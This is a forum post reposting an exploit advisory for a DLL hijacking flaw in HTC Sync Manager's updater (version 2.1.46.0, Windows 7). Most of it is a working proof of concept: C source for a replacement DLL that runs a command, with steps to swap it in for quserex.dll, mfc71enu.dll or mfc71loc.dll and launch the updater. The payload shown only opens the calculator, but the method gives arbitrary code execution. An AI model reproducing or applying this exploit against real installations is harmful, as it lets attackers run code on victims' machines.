Jump to content
Matt

HTCSyncManagerUpdate DLL Hijacking

Recommended Posts

Posted

Description : HTCSyncManagerUpdate suffers from a DLL hijacking vulnerability.

Author : Iranian_Dark_Coders_Team

Source : HTCSyncManagerUpdate DLL Hijacking ? Packet Storm

Code :

Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution 
Author: Iranian_Dark_Coders_Team
Discovered by A.CH12
Software Link: http://www.htc.com/
Version: 2.1.46.0
Tested on: Windows 7

// :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######::
// ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##:
// :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##:
// '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######::
// #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##::::::::
// ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##::::::::
// ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########:
// ..:::::..:::::...::::::......:::..:::::..:::......::.........::

=============================================================
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }

int egg()
{
system ("calc");
exit(0);
return 0;
}
=============================================================

Instructions:

1. Compile dll
2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll
3. Launch HTCSyncManagerUpdate
4. Bo0o0o0o0o0o0o0m !


Greet to my Lovely friends :
nimaarek , D.S (ASA);

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...